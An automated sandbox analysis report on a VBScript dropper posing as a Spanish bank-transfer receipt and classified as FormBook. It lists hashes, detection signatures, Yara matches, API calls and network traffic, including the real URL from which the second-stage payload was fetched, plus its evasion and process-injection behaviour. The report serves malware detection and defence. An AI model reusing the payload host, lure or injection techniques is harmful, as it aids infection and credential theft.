Windows Analysis Report
justificante de transferencia.vbs

Overview

General Information

Sample name: justificante de transferencia.vbs
Analysis ID: 1524799
MD5: 6a959a9276c026d279b40eedf42d93cb
SHA1: 7c7ef2838b5bce26ec80fa8c8becdd1b1242e5ae
SHA256: a7a6b9a027fefdba700161804b4cdd67843534c5b34aeb341a491c895f1fbda8
Tags: vbsuser-abuse_ch
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: AspNetCompiler Execution
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Avira: detection malicious, Label: TR/Dropper.Gen
Yara detected FormBook
Source: Yara match File source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.12:49710 version: TLS 1.2
Source: Binary string: VCGDG76823.pdb source: wscript.exe, 00000001.00000002.2448209205.000001B594E7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2443496915.000001B5945D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2411349967.000001B5940F5000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2414930191.0000000000222000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.1.dr
Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp

Networking
barindex
Potential malicious VBS script found (has network functionality)
Source: Initial file: stream.SaveToFile filePath, 2 ' Overwrite existing file
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /2alBy/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /2alBy/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: transfer.adttemp.com.br
Source: temp_executable.exe, 00000002.00000002.2440570878.0000000002547000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: temp_executable.exe, 00000002.00000002.2440570878.0000000002565000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://transfer.adttemp.com.br
Source: temp_executable.exe, 00000002.00000002.2440570878.0000000002565000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://transfer.adttemp.com.brl
Source: temp_executable.exe, 00000002.00000002.2440570878.0000000002547000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://transfer.adttemp.com.br
Source: wscript.exe, 00000001.00000002.2448209205.000001B594E7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2443496915.000001B5945D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2411349967.000001B5940F5000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2414930191.0000000000222000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe, 00000002.00000002.2440570878.0000000002547000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe.1.dr String found in binary or memory: https://transfer.adttemp.com.br/2alBy/sirdeeeeee.txt
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.12:49710 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0042C563 NtClose, 3_2_0042C563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A235C0 NtCreateMutant,LdrInitializeThunk, 3_2_01A235C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22DF0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_01A22DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22C70 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_01A22C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A23090 NtSetValueKey, 3_2_01A23090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A23010 NtOpenDirectoryObject, 3_2_01A23010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A24340 NtSetContextThread, 3_2_01A24340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A24650 NtSuspendThread, 3_2_01A24650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A239B0 NtGetContextThread, 3_2_01A239B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22BA0 NtEnumerateValueKey, 3_2_01A22BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22B80 NtQueryInformationFile, 3_2_01A22B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22BE0 NtQueryValueKey, 3_2_01A22BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22BF0 NtAllocateVirtualMemory, 3_2_01A22BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22B60 NtClose, 3_2_01A22B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22AB0 NtWaitForSingleObject, 3_2_01A22AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22AF0 NtWriteFile, 3_2_01A22AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22AD0 NtReadFile, 3_2_01A22AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22DB0 NtEnumerateKey, 3_2_01A22DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22DD0 NtDelayExecution, 3_2_01A22DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22D30 NtUnmapViewOfSection, 3_2_01A22D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22D00 NtSetInformationFile, 3_2_01A22D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A23D10 NtOpenProcessToken, 3_2_01A23D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22D10 NtMapViewOfSection, 3_2_01A22D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A23D70 NtOpenThread, 3_2_01A23D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22CA0 NtQueryInformationToken, 3_2_01A22CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22CF0 NtOpenProcess, 3_2_01A22CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22CC0 NtQueryVirtualMemory, 3_2_01A22CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22C00 NtQueryInformationProcess, 3_2_01A22C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22C60 NtCreateKey, 3_2_01A22C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22FA0 NtQuerySection, 3_2_01A22FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22FB0 NtResumeThread, 3_2_01A22FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22F90 NtProtectVirtualMemory, 3_2_01A22F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22FE0 NtCreateFile, 3_2_01A22FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22F30 NtCreateSection, 3_2_01A22F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22F60 NtCreateProcessEx, 3_2_01A22F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22EA0 NtAdjustPrivilegesToken, 3_2_01A22EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22E80 NtReadVirtualMemory, 3_2_01A22E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22EE0 NtQueueApcThread, 3_2_01A22EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A22E30 NtWriteVirtualMemory, 3_2_01A22E30
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 2_2_00BC11D8 2_2_00BC11D8
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 2_2_00BC2B28 2_2_00BC2B28
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 2_2_00BC2B19 2_2_00BC2B19
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 2_2_00BC2B17 2_2_00BC2B17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00402350 3_2_00402350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0042EB83 3_2_0042EB83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0040FCFB 3_2_0040FCFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00404486 3_2_00404486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0040FD03 3_2_0040FD03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_00402E60 3_2_00402E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_004166B3 3_2_004166B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0040FF23 3_2_0040FF23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0040DFA3 3_2_0040DFA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB01AA 3_2_01AB01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019FB1B0 3_2_019FB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AA81CC 3_2_01AA81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E0100 3_2_019E0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A8A118 3_2_01A8A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01ABB16B 3_2_01ABB16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A2516C 3_2_01A2516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019DF172 3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AA70E9 3_2_01AA70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AAF0E0 3_2_01AAF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F70C0 3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A9F0CC 3_2_01A9F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A3739A 3_2_01A3739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB03E6 3_2_01AB03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019FE3F0 3_2_019FE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AA132D 3_2_01AA132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019DD34C 3_2_019DD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AAA352 3_2_01AAA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F52A0 3_2_019F52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A912ED 3_2_01A912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0B2C0 3_2_01A0B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A90274 3_2_01A90274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A8D5B0 3_2_01A8D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AB0591 3_2_01AB0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F0535 3_2_019F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AA7571 3_2_01AA7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A9E4F6 3_2_01A9E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AAF43F 3_2_01AAF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AA2446 3_2_01AA2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E1460 3_2_019E1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AAF7B0 3_2_01AAF7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019EC7C0 3_2_019EC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F0770 3_2_019F0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A14750 3_2_01A14750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0C6E0 3_2_01A0C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AA16CC 3_2_01AA16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01ABA9A6 3_2_01ABA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F29A0 3_2_019F29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A06962 3_2_01A06962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F9950 3_2_019F9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0B950 3_2_01A0B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019D68B8 3_2_019D68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A1E8F0 3_2_01A1E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F38E0 3_2_019F38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A5D800 3_2_01A5D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F2840 3_2_019F2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019FA840 3_2_019FA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0FB80 3_2_01A0FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A2DBF9 3_2_01A2DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AA6BD7 3_2_01AA6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AAFB76 3_2_01AAFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AAAB40 3_2_01AAAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A35AA0 3_2_01A35AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A8DAAC 3_2_01A8DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019EEA80 3_2_019EEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A9DAC6 3_2_01A9DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A63A6C 3_2_01A63A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AAFA49 3_2_01AAFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AA7A46 3_2_01AA7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A08DBF 3_2_01A08DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A0FDC0 3_2_01A0FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019EADE0 3_2_019EADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019FAD00 3_2_019FAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AA7D73 3_2_01AA7D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F3D40 3_2_019F3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AA1D5A 3_2_01AA1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A90CB5 3_2_01A90CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AAFCF2 3_2_01AAFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E0CF2 3_2_019E0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A69C32 3_2_01A69C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F0C00 3_2_019F0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F1F92 3_2_019F1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AAFFB1 3_2_01AAFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019E2FC8 3_2_019E2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019FCFE0 3_2_019FCFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A32F28 3_2_01A32F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A10F30 3_2_01A10F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AAFF09 3_2_01AAFF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A64F40 3_2_01A64F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F9EB0 3_2_019F9EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01A02E90 3_2_01A02E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AACE93 3_2_01AACE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AAEEDB 3_2_01AAEEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01AAEE26 3_2_01AAEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_019F0E59 3_2_019F0E59
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 01A5EA12 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 01A25130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 019DB970 appears 266 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 01A6F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 01A37E54 appears 88 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: justificante de transferencia.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
